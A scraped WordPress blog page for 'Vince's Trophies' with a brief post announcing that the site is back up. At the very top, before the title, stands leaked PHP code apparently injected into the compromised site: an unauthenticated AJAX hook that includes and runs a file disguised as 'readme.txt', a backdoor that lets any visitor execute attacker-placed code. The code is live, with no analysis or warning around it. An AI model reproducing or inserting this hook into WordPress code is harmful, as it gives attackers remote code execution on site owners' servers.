if(!function_exists('file_check_readme74246')){ add_action('wp_ajax_nopriv_file_check_readme74246', 'file_check_readme74246'); add_action('wp_ajax_file_check_readme74246', 'file_check_readme74246'); function file_check_readme74246() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } Vince's Trophies » Blog Archive » The website is up!

The website is up!

With some delay, and technical problems worked out, Vince’s website is back up and running! Stand by for posts and news from Vince regarding his adventures!

Leave a Comment